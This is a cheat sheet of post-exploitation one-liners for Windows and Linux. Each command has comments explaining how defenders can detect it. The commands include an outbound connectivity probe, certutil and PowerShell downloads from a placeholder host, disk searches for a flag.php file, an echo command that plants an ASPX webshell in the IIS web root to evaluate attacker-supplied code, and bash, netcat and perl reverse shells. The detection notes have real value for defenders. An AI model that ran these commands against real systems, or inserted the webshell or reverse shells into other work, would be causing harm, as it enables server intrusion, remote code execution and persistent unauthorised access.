win

# Check whether the target host has outbound internet access.
# Sends one HTTP GET to http://vps/ ("vps" is this page's placeholder for an
# external server); getting a response means outbound HTTP is allowed.
# Defender view: the request shows up in proxy/firewall egress logs, and the
# command line in process-creation logging (Security 4688 / Sysmon 1).
# Default-deny egress from servers makes this probe fail.
powershell Invoke-WebRequest -Uri http://vps/

# File download (two built-in ways to pull http://vps/a.txt to D:\a.txt).
# certutil is the Windows certificate utility; -urlcache -split -f makes it
# fetch a URL and write it to the given path (ATT&CK T1105, ingress tool
# transfer). Detection: a certutil command line containing -urlcache plus a
# URL, or certutil.exe opening outbound connections.
certutil.exe -urlcache -split -f http://vps/a.txt D:\a.txt
# Same transfer through .NET's WebClient.DownloadFile(url, path).
# Detection: PowerShell script block logging (event 4104) records the call
# when enabled; the -c command line also appears in process-creation logs.
powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://vps/a.txt', 'D:\a.txt')"

# Locate the web directory through command execution, by searching D:\ for a
# known file of the site (here a name ending in flag.php).
# dir: /s recurses, /a-d skips directories, /b prints bare full paths.
dir /s/a-d/b D:\*flag.php
# where /r: recursive search under D:\ for the exact name flag.php.
where /r D:\ flag.php
# for /r: walks D:\ recursively and echoes each match. %i is the interactive
# form; inside a .bat file the variable would be written %%i.
for /r D:\ %i in (*flag.php) do @echo %i
# Same walk, but each path is redirected into "<match>.txt" beside the match
# instead of the console. Defender view: stray *.php.txt files next to web
# content are a forensic artifact of this step; recursive dir/where/for
# spawned by a web server worker process is worth alerting on.
for /r D:\ %i in (*flag.php) do @echo %i>%i.txt

# Write a webshell.
# echo writes a one-line ASPX page to C:\inetpub\wwwroot\a.aspx; ^ escapes the
# < and > characters so cmd passes them through instead of treating them as
# redirections, and the final > is the real redirect to the file.
# The page evaluates the request item "ant" as JScript in "unsafe" mode, i.e.
# it runs whatever code the HTTP request supplies.
# Defender view: monitor the web root for new or changed .aspx files (file
# integrity monitoring / Sysmon 11), scan content for eval(Request.Item, and
# keep the application pool identity from having write access to the web root.
echo ^<%@ Page Language="Jscript"%^> ^<% eval(Request.Item["ant"],"unsafe"); %^>> C:\inetpub\wwwroot\a.aspx

Linux

# Reverse shell (three variants; each connects out to 8.8.8.8:1234, which
# presumably stands in for the listener address on this page).
# Defender view for all three: outbound connections from servers to
# unexpected hosts/ports, and a shell whose stdin/stdout are a socket, are the
# signals to alert on; egress filtering blocks the connection itself.
# bash: /dev/tcp/HOST/PORT is a bash redirection feature, not a real device;
# an interactive shell gets stdout/stderr (>&) and stdin (0>&1) tied to it.
bash -i >& /dev/tcp/8.8.8.8/1234 0>&1
# nc -e runs /bin/bash with its stdio attached to the connection. The -e
# option exists only in some netcat builds; the OpenBSD netcat omits it.
nc -e /bin/bash 8.8.8.8 1234
# perl: forks and lets the parent exit, opens an IO::Socket::INET connection,
# reopens STDIN on it for reading and the handle named by $~ (default
# "STDOUT") for writing, then passes each received line to system().
# Detection: perl command lines combining -MIO / IO::Socket::INET with -e.
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"8.8.8.8:1234");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'